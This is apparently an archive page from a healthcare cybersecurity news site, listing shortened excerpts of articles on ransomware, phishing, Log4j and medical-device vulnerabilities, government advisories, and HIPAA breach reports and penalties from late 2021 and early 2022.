Phishing attacks allow threat actors to obtain credentials, but multi-factor authentication (MFA) makes it harder for phishing attacks to succeed. With MFA enabled, in addition to a username and password, another method of authentication is required before account access is granted. Microsoft has previously said multi-factor authentication blocks 99.9% of automated account compromise attacks; however, MFA does not guarantee protection. A new breed of phishing kit is being increasingly used to bypass MFA. Researchers at Proofpoint explained in a recent blog post that phishing kits are now being used that leverage a transparent reverse proxy (TRP), which allows browser man-in-the-middle (MitM) attacks. The phishing kits allow the attackers to compromise browser sessions and steal credentials and session cookies in real time, allowing a full account takeover without alerting the victim. There are multiple phishing kits that can often be purchased for a low cost that allow MFA to be bypassed; some are simple with no-frills functionality, while others are more sophisticated and...

HC3: Lessons Learned from the Ransomware Attack on Ireland’s Health Service Executive
Feb 08

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has released a report providing insights into the May 2021 Conti ransomware attack on the Health Service Executive (HSE) in Ireland, and advice for healthcare and public health organizations to help them prepare for, respond to, and recover from ransomware attacks. The report provides information on the vulnerabilities and weaknesses that were exploited by the Conti ransomware gang, and how the HSE’s lack of preparedness for ransomware attacks hampered its efforts to detect, respond to, and remediate the attack and contributed to the long and expensive recovery process. The Conti ransomware gang, believed to be a reincarnation of the notorious Ryuk ransomware operation, first gained access to the HSE network on May 7, 2021, and the networks of six voluntary hospitals and one statutory hospital were compromised between May 8, 2021, and May 12, 2021. One of the affected hospitals detected the attack on May 10, and the HSE was alerted to the cyberattack on May 12. Between May 12 and May 13, the attacker accessed files and...

FBI Shares Technical Details of Lockbit 2.0 Ransomware
Feb 08

The Federal Bureau of Investigation (FBI) has released indicators of compromise (IoCs) and details of the tactics, techniques, and procedures (TTPs) associated with Lockbit 2.0 ransomware. Lockbit is a ransomware-as-a-service (RaaS) operation that has been active since September 2019. In the summer of 2021, a new version of the ransomware – Lockbit 2.0 – was released that had more advanced features, including the ability to automatically encrypt files across Windows domains via Active Directory group policies, and a Linux-based variant was also developed that could exploit vulnerabilities in VMware ESXi virtual machines. The affiliates working for the ransomware operation use a range of TTPs in their attacks, which makes prevention, detection, and mitigation a challenge for security teams. Initial access is gained by exploiting unpatched vulnerabilities, using zero-day exploits, and purchasing access to business networks from initial access brokers (IABs). Shortly after the relaunch of the RaaS, the threat actor started advertising on hacking forums trying to recruit...

Unpatched Vulnerabilities are the Most Common Attack Vector Exploited by Ransomware Actors
Feb 04

Ransomware gangs are increasingly targeting unpatched vulnerabilities in software and operating systems to gain access to business networks, and they are weaponizing zero-day vulnerabilities at record speed. Unpatched vulnerabilities are now the primary attack vector in ransomware attacks, according to Ivanti’s Ransomware End of Year Spotlight report. Ivanti partnered with the CVE Numbering Authority (CNA) Cyber Security Works and the next-gen SOAR and threat intelligence solution provider Cyware for its report, which identified 32 new ransomware variants in 2021 – an increase of 26% from the previous year. There are now 157 known ransomware families that are being used in cyberattacks on businesses. Ivanti says 65 new vulnerabilities were identified in 2021 that are known to have been exploited by ransomware gangs – an increase of 29% year-over-year – bringing the total number of vulnerabilities tied to ransomware attacks to 288. 37% of the new vulnerabilities were trending on the dark web and have been exploited in multiple attacks, and 56% of the 223 older...

HC3: BlackMatter Ransomware Threat Level Reduced
Feb 03

In September 2021, the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) issued an advisory to the health sector about an elevated threat of BlackMatter ransomware attacks. A few days ago, a second advisory was issued stating the threat level has been reduced to Blue/Guarded. HC3 said the ransomware-as-a-service (RaaS) operation appears to have been shut down and there have been no further victims listed on the BlackMatter RaaS data leak site since October 31, 2021. The BlackMatter ransomware operation is believed by many security experts to be a rebranding of the DarkSide ransomware gang, which conducted the ransomware attack on Colonial Pipeline in May 2021 that disrupted fuel delivery to the Eastern Seaboard. The DarkSide operation was shut down shortly after the Colonial Pipeline attack, and BlackMatter ransomware attacks started in July 2021. Approximately half of the attacks conducted by the BlackMatter ransomware gang were on entities based in the United States, including at least four healthcare organizations – a...

Technologies Supporting Telehealth Have Placed Healthcare Data at Risk
Feb 02

A new report from Kaspersky shows the massive increase in telehealth has placed healthcare data at risk. Vulnerabilities have been found in the technologies that support telemedicine, many of which have not yet been addressed. Massive Increase in the Use of Telehealth The COVID-19 pandemic has led to an increase in virtual visits, with healthcare providers increasing access to telehealth care to help curb infections and cut costs. Virtual visits are conducted via the telephone, video-conferencing apps, and other platforms, and a host of new technologies and products such as wearable devices for measuring vital signs, implanted sensors, and cloud services are also being used to support telehealth. Data from McKinsey shows telemedicine usage has increased by 38% since before the emergence of SARS-CoV-2 and COVID-19, and the CDC reports that between June 26, 2020, and November 6, 2020, around 30% of all consultations with doctors were taking place virtually. Kaspersky says that its own data indicate 91% of healthcare providers around the world have implemented the technology to give...

Settlement Reached in Excellus Class Action Data Breach Lawsuit
Jan 26

Excellus Health Plan Inc., its affiliated companies, and the Blue Cross Blue Shield Association (BCBSA) have reached a settlement to resolve a class action lawsuit that was filed in relation to a cyberattack discovered in 2015. The attack involved the personally identifiable information (PII) and protected health information (PHI) of more than 10 million members, subscribers, insureds, patients, and customers. The cyberattack was detected on August 5, 2015, by a cybersecurity firm that was hired to assess Excellus’s information technology system. The subsequent investigation by Excellus and cybersecurity firm Mandiant determined hackers had first gained access to its systems on or before December 23, 2013. Evidence was found that indicated the hackers were active within its network until Aug. 18, 2014, after which no traces of activity were found; however, malware had been installed which gave the attackers access to its network until May 11, 2015. On that date, something happened that prevented the hackers from accessing its network. It took Excellus 17 months from the...

New York Fines EyeMed $600,000 for 2.1 Million-Record Data Breach
Jan 25

The first settlement of 2022 to resolve a healthcare data breach has been announced by New York Attorney General Letitia James. The Ohio-based vision benefits provider EyeMed Vision Care has agreed to pay a financial penalty of $600,000 to resolve a 2020 data breach that saw the personal information of 2.1 million individuals compromised nationwide, including the personal information of 98,632 New York residents. The data breach occurred on or around June 24, 2020, and saw unauthorized individuals gain access to an EyeMed email account that contained sensitive consumer data provided in connection with vision benefits enrollment and coverage. The attacker had access to the email account for around a week and was able to view emails and attachments spanning a period of 6 years dating back to January 3, 2014. The emails contained a range of sensitive information including names, contact information, dates of birth, account information for health insurance accounts, full or partial Social Security numbers, Medicare/Medicaid numbers, driver’s license numbers, government ID numbers,...

Read More
More Than Half of All Healthcare IoT Devices Have a Known, Unpatched Critical Vulnerability
Jan24

A recent study by the healthcare IoT security platform provider Cynerio has revealed 53% of connected medical devices and other healthcare IoT devices have at least one unaddressed critical vulnerability that could potentially be exploited to gain access to networks and sensitive data or affect the availability of the devices. The researchers also found a third of bedside healthcare IoT devices have at least one unpatched critical vulnerability that could affect service availability, data confidentiality, or place patient safety in jeopardy. The researchers analyzed the connected device footprints at more than 300 hospitals to identify risks and vulnerabilities in their Internet of Medical Things (IoMT) and IoT devices. IV pumps are the most commonly used healthcare IoT device, making up around 38% of a hospital’s IoT footprint. It is these devices that were found to be the most vulnerable to attack, with 73% having a vulnerability that could threaten patient safety, service availability, or result in data theft. 50% of VoIP systems contained vulnerabilities, with ultrasound...

Read More
Healthcare Cybersecurity Risks in 2022
Jan24

The healthcare industry continues to face a considerable range of threats, with ransomware attacks and data breaches still highly prevalent. Throughout 2021, healthcare data breaches were being reported at a rate of almost 2 per day, and while there was a reduction in the number of ransomware attacks compared to 2020, ransomware remains a major threat with several ransomware gangs actively targeting the healthcare sector. In its Q4, 2021 Healthcare Cybersecurity Bulletin, released on Friday, the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) warned of some of the ongoing cyberattack trends that are expected to continue in Q1, 2022.

Ransomware

Law enforcement agencies in the United States and Europe have increased their efforts to bring the operators of ransomware operations and their affiliates to justice, with those efforts resulting in the arrests of key members of several ransomware groups. This year, in a rare act of cooperation between the United States and Russia, 14 suspected members of the notorious REvil ransomware gang...

Read More
CISA Urges All U.S. Orgs to Take Immediate Action to Protect Against Wiper Malware Attacks
Jan21

The DHS’ Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning to all organizations in the United States to take immediate steps to prepare for attempted cyberattacks involving a new wiper malware that has been used in targeted attacks on government agencies, non-profits, and information technology organizations in Ukraine. The malware – dubbed Whispergate – masquerades as ransomware and generates a ransom note when executed; however, the malware lacks the capabilities to allow files to be recovered. Whispergate consists of a Master Boot Record (MBR) wiper, a file corrupter, and a Discord-based downloader. The MBR is the section of the hard drive that identifies how and where an operating system is located. Wiping the MBR will brick an infected device by making the hard drive inaccessible. The Microsoft Threat Intelligence Center (MSTIC) has recently performed an analysis of the new malware. The first stage of the malware, typically called stage1.exe, wipes the MBR and prevents the operating system from loading. The malware is executed when an infected...

Read More
December 2021 Healthcare Data Breach Report
Jan18

56 data breaches of 500 or more healthcare records were reported to the HHS’ Office for Civil Rights (OCR) in December 2021, which is a 17.64% decrease from the previous month. In 2021, an average of 59 data breaches were reported each month and 712 healthcare data breaches were reported between January 1 and December 31, 2021. That sets a new record for healthcare data breaches, exceeding last year’s total by 70 – a 10.9% increase from 2020. Across December’s 56 data breaches, 2,951,901 records were exposed or impermissibly disclosed – a 24.52% increase from the previous month. At the time of posting, the OCR breach portal shows 45,706,882 healthcare records were breached in 2021 – the second-highest total since OCR started publishing summaries of healthcare data breaches in 2009.

Largest Healthcare Data Breaches in December 2021

Name of Covered Entity             State  Covered Entity Type  Individuals Affected  Breach Cause
Oregon Anesthesiology Group, P.C.  OR     Healthcare Provider  750,500               Ransomware
Texas ENT Specialists              TX     Healthcare Provider  535,489               Ransomware
Monongalia Health System, Inc....

Read More
Disruption to Services at Maryland Department of Health Continues One Month After Ransomware Attack
Jan14

Maryland Chief Information Security Officer (CISO) Chip Stewart has issued a statement confirming the disruption to services at the Maryland Department of Health (MDH) was the result of a ransomware attack. A security breach was detected in the early hours of December 4, 2021, and prompt action was taken to isolate the affected server and contain the attack. Stewart said the Department of Information Technology successfully isolated and contained the affected systems within a matter of hours, limiting the severity of the attack. “It is in part because of this swift response that we have not identified, to this point in our ongoing investigation, evidence of the unauthorized access to or acquisition of State data,” said Stewart in a statement issued on January 12, 2022. According to Stewart, there was an attempted distributed-denial-of-service (DDoS) attack shortly after the ransomware attack; however, that attack was not successful. Evidence gathered during the investigation of the ransomware and DDoS attacks indicates they were conducted by different threat actors. Stewart said he...

Read More
New HIPAA Regulations in 2022
Jan14

It has been several years since new HIPAA regulations have been signed into law, but HIPAA changes in 2022 are expected. The last update to the HIPAA Rules was the HIPAA Omnibus Rule in 2013, which introduced new requirements mandated by the Health Information Technology for Economic and Clinical Health (HITECH) Act. OCR issued a Notice of Proposed Rulemaking (NPRM) on December 10, 2020, that proposed a slew of changes to the HIPAA Privacy Rule, and a Final Rule is expected to be issued in 2022; however, no date has yet been provided on when the 2022 HIPAA changes will take effect and become enforceable. Over the past few years, new HIPAA regulations under consideration include changes to how substance abuse and mental health information records are protected. As part of efforts to tackle the opioid crisis, the HHS is considering changes to both HIPAA and 42 CFR Part 2 regulations that serve to protect the privacy of substance abuse disorder patients who seek treatment at federally assisted programs to improve the level of care that can be provided. There have been calls from many...

Read More
Critical Infrastructure Entities Warned About Cyberattacks by State-sponsored Russian APT Actors
Jan13

The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) have issued a joint advisory warning about the threat of Russian cyberattacks on critical infrastructure, including the healthcare, energy, government, and telecommunications sectors. “CISA, the FBI, and NSA encourage the cybersecurity community – especially critical infrastructure network defenders – to adopt a heightened state of awareness and to conduct proactive threat hunting,” explained the agencies in the advisory. The agencies have shared details of the tactics, techniques, and procedures (TTPs) commonly used by Russian state-sponsored advanced persistent threat (APT) actors to gain persistent access to networks for espionage and destructive cyberattacks. Russian APT actors use a variety of methods to breach perimeter defenses including spear phishing, brute force attacks against accounts and networks with weak security, and the exploitation of unpatched vulnerabilities, and have previously targeted vulnerable...

Read More
2020-2021 HIPAA Violation Cases and Penalties
Jan04

The Department of Health and Human Services’ Office for Civil Rights (OCR) settled 19 HIPAA violation cases in 2020. More financial penalties were issued in 2020 than in any other year since the Department of Health and Human Services was given the authority to enforce HIPAA compliance. $13,554,900 was paid to OCR to settle the HIPAA violation cases. 2021 saw a slight reduction in the number of settlements and fines for HIPAA violations, with 14 enforcement actions announced by OCR. Even so, 2021 had the second-highest number of HIPAA fines of any year since OCR started enforcing compliance with the HIPAA Rules. While the number of penalties was still high in 2021, there was a sizeable reduction in penalty amounts which totaled $5,982,150 for the year, and $5,100,000 of that total came from just one enforcement action. The reason for this is that most of the penalties were for violations of the HIPAA Right of Access, and were in response to investigations of complaints filed by patients who had not been provided with timely access to their medical records, rather than penalties for...

Read More
Healthcare Supply Chain Association Issues Guidance on Medical Device and Service Cybersecurity
Dec31

The Healthcare Supply Chain Association (HSCA) has issued guidance for healthcare delivery organizations, medical device manufacturers, and service suppliers on securing medical devices to make them more resilient to cyberattacks. The use of medical devices in healthcare has grown at an incredible rate and they are now relied upon to provide vital clinical functions that cannot be compromised without diminishing patient care. Medical devices are, however, often vulnerable to cyber threats and could be attacked to cause harm to patients, be taken out of service to pressure healthcare providers into meeting attackers’ extortion demands, or could be accessed remotely to obtain sensitive patient data. Medical devices are often connected to the Internet and can easily be attacked, so it is essential for proactive steps to be taken to improve security. The HSCA represents healthcare group purchasing organizations (GPOs) and advocates for fair procurement practices and education to improve the efficiency of purchases of healthcare goods and services and, as such, has a unique line of...

Read More
November 2021 Healthcare Data Breach Report
Dec21

The number of reported healthcare data breaches has increased for the third successive month, with November seeing 68 data breaches of 500 or more records reported to the HHS’ Office for Civil Rights – a 15.25% increase from October and well above the 12-month average of 56 data breaches a month. From January 1 to November 30, 614 data breaches were reported to the Office for Civil Rights. It is looking increasingly likely that this year will be the worst ever year for healthcare data breaches. The number of data breaches increased, but there was a sizable reduction in the number of breached records. Across the 68 reported breaches, 2,370,600 healthcare records were exposed, stolen, or impermissibly disclosed – a 33.95% decrease from the previous month and well below the 12-month average of 3,430,822 breached records per month.

Largest Healthcare Data Breaches Reported in November 2021

In November, 30 data breaches of 10,000 or more records were reported to the HHS’ Office for Civil Rights, and 4 of those breaches resulted in the exposure/theft of more than 100,000 records. The...

Read More
New Data Reveals Extent of Ransomware Attacks on the Healthcare Sector
Dec20

The CyberPeace Institute has released new data on cyberattacks on the healthcare industry. According to the latest figures, 295 cyberattacks are known to have been conducted on the healthcare sector in the past 18 months between June 2, 2020, and December 3, 2021. The attacks have been occurring at a rate of 3.8 per week and have occurred in 35 countries. Those attacks include 263 incidents that have either been confirmed as ransomware attacks (165) or are suspected of involving ransomware (98), with those attacks occurring in 33 countries at a rate of 3.4 incidents a week. Over the past 18 months, at least 39 different ransomware groups have conducted ransomware attacks on the healthcare sector. Those attacks have mostly been on patient care services (179), followed by pharma (35), medical manufacturing & development (26), and other medical organizations (23). The CyberPeace Institute studied darknet publications, correspondence with ransomware gangs, and interviews and identified 12 ransomware groups that had stated they would not conduct attacks on the healthcare sector...

Read More
Third Version of Log4j Released to Fix High Severity DoS Vulnerability
Dec20

The original vulnerability identified in Log4j (CVE-2021-44228) that sent shockwaves around the world due to its seriousness, ease of exploitation, and the extent to which it impacts software and cloud services, is not the only vulnerability in the Java-based logging utility. After releasing version 2.15.0 to fix the flaw, it was determined that version 2.15.0 was still vulnerable in certain non-default configurations due to an incomplete patch. The new vulnerability is tracked as CVE-2021-45046 and was fixed in version 2.16.0 of Log4j. Initially, the vulnerability was assigned a CVSS score of 3.7 (low severity); however, the severity score has since been increased to critical (CVSS 9.0), as while this flaw was initially reported as a denial-of-service bug, it was later determined that it could be exploited to allow data exfiltration and remote code execution. According to Apache, “When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious...

Read More
Learnings from a Major Healthcare Ransomware Attack
Dec13

One of the most serious healthcare ransomware attacks occurred in Ireland earlier this year. The Health Service Executive (HSE), the Republic of Ireland’s national health system, suffered a major attack that resulted in Conti ransomware being deployed and forced its National Healthcare Network to be taken offline. That meant healthcare professionals across the country were prevented from accessing all HSE IT systems, including clinical care systems, patient records, laboratory systems, payroll, and other clinical and non-clinical systems, which caused major disruption to healthcare services across the country. Following the attack, the HSE Board commissioned PricewaterhouseCoopers (PWC) to conduct an independent post-incident review into the attack to establish the facts related to technical and operational preparedness and the circumstances that allowed the attackers to gain access to its systems, exfiltrate sensitive data, encrypt files, and extort the HSE.

Cybersecurity Failures that are Common in the Healthcare Industry

PWC’s recently published report highlights a number of...

Read More
Max-Severity Apache Log4j Zero-day Vulnerability Extensively Exploited in the Wild
Dec13

A maximum-severity vulnerability has been identified in Apache Log4j, an open-source Java-based logging library used by many thousands of organizations in their enterprise applications and by many cloud services. The vulnerability, dubbed Log4Shell and tracked as CVE-2021-44228, is as serious as they come, with some security researchers claiming the flaw is the most serious to be discovered in the past decade due to its ease of exploitation and the sheer number of enterprise applications and cloud services that are affected. The vulnerability can be exploited without authentication to achieve remote code execution and take full control of vulnerable systems. The vulnerability affects Apache Log4j versions 2.0 through 2.14.1, and has been fixed in version 2.15.0. The advice is to ensure the upgrade is performed immediately as a proof-of-concept exploit for the flaw is in the public domain, extensive scans are being performed for vulnerable systems, and there have been many cases of the flaw being exploited in the wild. Some reports suggest the improper input validation bug has been...

Read More
High-Severity Authentication Bug Identified in Hillrom Welch Allyn Cardio Products
Dec10

A high-severity vulnerability has been identified in certain Hillrom Welch Allyn Cardio products that allows accounts to be accessed without a password. The vulnerability is an authentication bypass issue that exists when the Hillrom cardiology products have been configured to use single sign-on (SSO). The vulnerability allows the manual entry of any Active Directory (AD) account provisioned within the application, and access will be granted without having to provide the associated password. That means a remote attacker could access the application under the provided AD account and gain all privileges associated with the account. The vulnerability is tracked as CVE-2021-43935 and has been assigned a CVSS v3 base score of 8.1 out of 10. According to Hillrom, the vulnerability affects the following Hillrom Welch Allyn cardiology products:

Welch Allyn Q-Stress Cardiac Stress Testing System: Versions 6.0.0 through 6.3.1
Welch Allyn X-Scribe Cardiac Stress Testing System: Versions 5.01 through 6.3.1
Welch Allyn Diagnostic Cardiology Suite: Version 2.1.0
Welch Allyn Vision Express:...

Read More
SonicWall Recommends Immediate Firmware Upgrade to Fix Critical Flaws in SMA 100 Series Appliances
Dec09

SonicWall has released new firmware for its Secure Mobile Access (SMA) 100 series remote access appliances that fixes 8 vulnerabilities including 2 critical and 4 high-severity flaws. Vulnerabilities in SonicWall appliances are attractive to threat actors and have been targeted in the past in ransomware attacks. While there are currently no known cases of the latest batch of vulnerabilities being exploited in the wild, there is a high risk of these vulnerabilities being exploited if the firmware is not updated promptly. SMA 100 series appliances include the SonicWall SMA 200, 210, 400, 410, and 500v secure access gateway products, all of which are affected. The most serious vulnerabilities are buffer overflow issues which could be exploited remotely by an unauthenticated attacker to execute code on vulnerable appliances. These are CVE-2021-20038, an unauthenticated stack-based buffer overflow vulnerability (CVSS score of 9.8), and CVE-2021-20045, which covers multiple unauthenticated file explorer heap-based and stack-based buffer overflow issues (CVSS score 9.4). A further...

Read More
Guidance Issued for Healthcare CISOs on Identity, Interoperability, and Patient Access
Dec06

The Health Information Sharing and Analysis Center (Health-ISAC) has released guidance for Chief Information Security Officers (CISOs) on adopting an identity-centric approach to enabling secure and easy access to patient data to meet the interoperability, patient access, and data sharing requirements of the 21st Century Cures Act. New federal regulations tied to the 21st Century Cures Act call for healthcare organizations to provide patients with easy access to their healthcare data and ensure patients can easily share their electronic health information (EHI) data wherever, whenever, and with whomever they want. The failure of a healthcare organization to implement systems to support patient access and interoperability could be considered information blocking and would be subject to fines and penalties. The new federal requirements are for healthcare providers and insurers to allow data sharing through Application Programming Interfaces (APIs) that operate on the Fast Healthcare Interoperability Resources (FHIR) standard. Healthcare providers and insurers are required to...

Read More
Biomanufacturing Sector Warned of High Risk of Tardigrade Malware Attacks
Dec06

A highly sophisticated malware capable of aggressively spreading within networks is being used in targeted attacks on the biomanufacturing sector. The malware has been named Tardigrade by security researchers and initial research suggests it may be a variant of SmokeLoader – a commonly used malware loader and backdoor – although SmokeLoader and Tardigrade malware are quite distinct. The sophisticated nature of the malware coupled with the targeted attacks on vaccine manufacturers and their partners strongly suggest the malware was developed and is being used by an Advanced Persistent Threat (APT) actor. The malware was first detected being used in attacks on the biomanufacturing sector in the spring of 2021 when an infection was discovered at a large U.S. biomanufacturing facility. The malware was identified again in an attack on a biomanufacturing firm in October 2021 and it is believed to have been used in attacks on several firms in the sector. In contrast to SmokeLoader, which requires instructions to be sent to the malware from its command-and-control infrastructure, Tardigrade...

Read More
APT Actors Exploiting Zoho ManageEngine ServiceDesk Plus to Deliver Webshells
Dec03

An APT actor that was targeting a vulnerability in the enterprise password management and single sign-on solution Zoho ManageEngine ADSelfService Plus has started exploiting another critical vulnerability in a different Zoho product, the IT helpdesk and asset management solution Zoho ManageEngine ServiceDesk Plus. The APT group had been exploiting a critical vulnerability in ManageEngine ADSelfService Plus tracked as CVE-2021-40539, which affects Zoho ManageEngine ADSelfService Plus version 6113 and prior, and is a REST API authentication bypass that can be exploited to allow remote code execution. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory on December 2, 2021, about a different vulnerability being exploited by the APT actor. The vulnerability, CVE-2021-44077, affects all versions of Zoho ManageEngine ServiceDesk Plus (on-premises) prior to version 11306. The vulnerability is related to RestAPI URLs in a servlet and ImportTechnicians in the Struts configuration. Successful exploitation of the...

Read More
HHS Launches 405(d) Program Website Providing Resources to Help Mitigate Healthcare Cybersecurity Threats
Dec03

The Department of Health and Human Services has launched a new website that offers advice and resources to help the healthcare and public health sector mitigate cybersecurity threats. The website was created as part of the HHS 405(d) Aligning Health Care Industry Security Approaches Program, which was established in response to the Cybersecurity Act of 2015. The Cybersecurity Act of 2015 called for the HHS to establish the program and a Task Group to enhance cybersecurity and align industry approaches by developing a common set of voluntary, consensus-based, and industry-led cybersecurity guidelines, practices, methodologies, procedures and processes that healthcare organizations can use. More than 150 individuals from industry and the federal government have collaborated under the program and provided insights into how best to mitigate cyberthreats. The new website supports the motto, Cyber Safety is Patient Safety, and provides videos and other educational material to raise awareness of pertinent threats along with vetted cybersecurity resources to drive behavioral change and...

Read More
CISA Publishes Mobile Device Cybersecurity Checklist for Organizations
Nov30

The Cybersecurity and Infrastructure Security Agency (CISA) has published new guidance for enterprises to help them secure mobile devices and safely access enterprise resources using mobile devices. The Enterprise Mobility Management (EMM) system checklist has been created to help businesses implement best practices to mitigate vulnerabilities and block threats that could compromise mobile devices and the enterprise networks to which they connect. The steps outlined in the checklist are easy for enterprises to implement and can greatly improve mobile device security and allow mobile devices to be safely used to access business networks. CISA recommends a security-focused approach to mobile device management. When selecting mobile devices that meet enterprise requirements, an assessment should be performed to identify potential supply chain risks. The Mobile Device Management (MDM) system should be configured to update automatically to ensure it is always running the latest version of the software and patches are applied automatically to fix known vulnerabilities. A policy should be...

Read More
Increased Risk of Cyber and Ransomware Attacks Over Thanksgiving Weekend
Nov23

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have warned organizations in the United States about the increased risk of cyberattacks over Thanksgiving weekend. Cyber threat actors are often at their most active during holidays and weekends, as there are likely to be fewer IT and security employees available to detect attempts to breach networks. Recent attacks have demonstrated holiday weekends are prime time for cyber threat actors, with Las Vegas Cancer Center one of the most recent victims of such an attack on the Labor Day weekend. The warning applies to all organizations and businesses, but especially critical infrastructure firms. Cyber actors around the world may choose Thanksgiving weekend to conduct attacks to disrupt critical infrastructure and conduct ransomware attacks. CISA and the FBI are urging all entities to take steps to ensure risk is effectively mitigated ahead of the holiday weekend to help prevent them from becoming the next victim of a costly cyberattack. Steps that should be taken immediately...

Read More
HC3 Warns Healthcare Sector About Risk of Zero-day Attacks
Nov23

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has issued a threat brief warning the healthcare and public health sector about an increase in financially motivated zero-day attacks, outlining mitigation tactics that should be adopted to reduce risk to a low and acceptable level. A zero-day attack leverages a vulnerability for which a patch has yet to be released. The vulnerabilities are referred to as zero-day, as the developer has had no time to release a patch to correct the flaw. Zero-day attacks are those where a threat actor has exploited a zero-day vulnerability using a weaponized exploit for the flaw. Zero-day vulnerabilities are exploited in attacks on all industry sectors and are not only a problem for the healthcare industry. For instance, in 2010, exploits were developed for four zero-day vulnerabilities in the “Stuxnet” attack on the Iranian nuclear program, which caused Iranian centrifuges to self-destruct. More recently, in 2017, a zero-day vulnerability was exploited to deliver the Dridex banking Trojan. While it...

Read More
Vulnerabilities Identified in Philips IntelliBridge, Patient Information Center and Efficia Patient Monitors
Nov19

Five vulnerabilities have been identified that affect the IntelliBridge EC 40 and EC 80 Hub, Philips Patient Information Center iX, and Efficia CM series patient monitors.

IntelliBridge EC 40 and EC 80 Hub

Two vulnerabilities have been identified that affect C.00.04 and prior versions of the IntelliBridge EC 40 and EC 80 Hub. Successful exploitation of the vulnerabilities could allow an unauthorized individual to execute software, change system configurations, and update/view files that may include unidentifiable patient data. The first vulnerability is due to the use of hard-coded credentials – CVE-2021-32993 – in the software for its own inbound authentication, outbound communication to external components, or the encryption of internal data. The second vulnerability is an authentication bypass issue – CVE-2021-33017. While the standard access path of the product requires authentication, an alternative path has been identified that does not require authentication. Both vulnerabilities have been assigned a CVSS v3 severity score of 8.1 out of 10. Philips has not yet issued an...

Read More
Iranian APT Actors Actively Exploiting Microsoft Exchange and Fortinet Vulnerabilities
Nov18

A joint cybersecurity advisory has been issued by the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC) warning of ongoing attacks by an Iranian Advanced Persistent Threat (APT) actor on critical infrastructure sectors including the healthcare and public health sector. Cyber actors known to be associated with the Iranian government have been exploiting vulnerabilities in the Fortinet FortiOS operating system since at least March 2021, and have been leveraging a Microsoft Exchange ProxyShell vulnerability since October 2021 to gain access to targets’ networks. The attacks appear to be focused on exploiting the vulnerabilities rather than any specific sector. Once the vulnerabilities have been exploited to gain a foothold in networks, the threat actor can perform a range of follow-on operations, which have included data exfiltration and data encryption. The threat actors are exploiting three vulnerabilities in Fortinet Devices –...

82% Of Healthcare Organizations Have Experienced an IoT Cyberattack in the Past 18 Months
Nov 18

A new study conducted by Medigate and CrowdStrike has highlighted the extent to which healthcare Internet of Things (IoT) devices are being targeted by threat actors and warns about the worrying state of IoT security in the healthcare industry. The number of IoT devices being used in healthcare has increased significantly in recent years as connected health drives a revolution in care delivery. Healthcare providers are increasingly reliant on IoT devices to perform a range of essential functions, and while the devices offer huge clinical benefits, full consideration should be given to cybersecurity. Cyber threat actors have disproportionately targeted healthcare organizations for many years due to the high value of healthcare data, the ease with which it can be monetized, and the relatively poor cybersecurity defenses in healthcare compared to other industry sectors. The rapid adoption of IoT devices has resulted in a major increase in the attack surface, which gives cyber actors even more opportunities to conduct attacks. Further, IoT devices often have weaker cybersecurity controls...

Patients Unaware of the Extent of Healthcare Cyberattacks and Data Theft
Nov 16

A recent survey conducted by the unified asset visibility and security platform provider Armis has explored the state of cybersecurity in healthcare and the security risks that are now faced by healthcare organizations. The survey was conducted by Censuswide on 400 IT professionals at healthcare organizations across the United States, and 2,000 U.S. patients, to obtain their views on cybersecurity and data breaches in healthcare. The survey confirmed cyber risk is increasing, with 85% of respondents saying cyber risk has increased over the past 12 months. Ransomware gangs have targeted the healthcare industry over the past 12 months, and many of those attacks have succeeded. 58% of the surveyed IT professionals said their organization had experienced a ransomware attack in the past 12 months. Ransomware attacks were viewed as a cause for concern by 13% of IT security pros, indicating most are confident that they will be able to recover data in the event of an attack. However, data breaches that result in the loss of patient data were a major worry, with 52% of IT pros rating data...

Medical Devices Affected by 13 Siemens Nucleus RTOS TCP/IP Stack Vulnerabilities
Nov 15

13 vulnerabilities have been identified in the Siemens Nucleus RTOS TCP/IP stack that could potentially be exploited remotely by threat actors to achieve arbitrary code execution, conduct a denial-of-service attack, and obtain sensitive information. The vulnerabilities, dubbed NUCLEUS:13, affect the TCP/IP stack and related FTP and TFTP services of the networking component (Nucleus NET) of the Nucleus Real-Time Operating System (RTOS), which is used in many safety-critical devices. In healthcare, Nucleus is used in medical devices such as anesthesia machines and patient monitors. One critical vulnerability allowing remote code execution has a CVSS v3 severity score of 9.8 out of 10. Ten of the vulnerabilities are rated high severity flaws, with CVSS scores ranging from 7.1 to 8.8. There are also two medium-severity flaws with CVSS scores of 6.5 and 5.3. The vulnerabilities were identified by security researchers at Forescout Research Labs, with assistance provided by researchers at Medigate. The vulnerabilities affect the following Nucleus RTOS...

DOJ Indicts 2 REvil Ransomware Gang Members: State Department Now Offering $10 Million Reward for Information
Nov 11

The United States Department of Justice (DoJ) has unsealed indictments charging two individuals for their roles in multiple REvil/Sodinokibi ransomware attacks on organizations in the United States. Ukrainian national, Yaroslav Vasinskyi, 22, has been indicted on multiple charges related to the ransomware attacks, including the supply chain attack that saw Kaseya’s Virtual System/Server Administrator (VSA) platform compromised. That attack involved ransomware being deployed on the systems of around 40 managed service providers and 1,500 downstream businesses. Russian national, Yevgeniy Igoryevich Polyanin, 28, has been indicted for his role in multiple ransomware attacks, including attacks on government entities in Texas. The DoJ says it seized $6.1 million in ransom payments that were paid to cryptocurrency wallets linked to Polyanin. The DoJ has indicted several individuals believed to have been involved in cyberattacks in the United States; however, those individuals can only face trial if they are located, arrested, and extradited to the United States. Many ransomware threat...

HC3: Cobalt Strike Penetration Testing Framework Increasingly Used in Cyberattacks on Healthcare Organizations
Nov 10

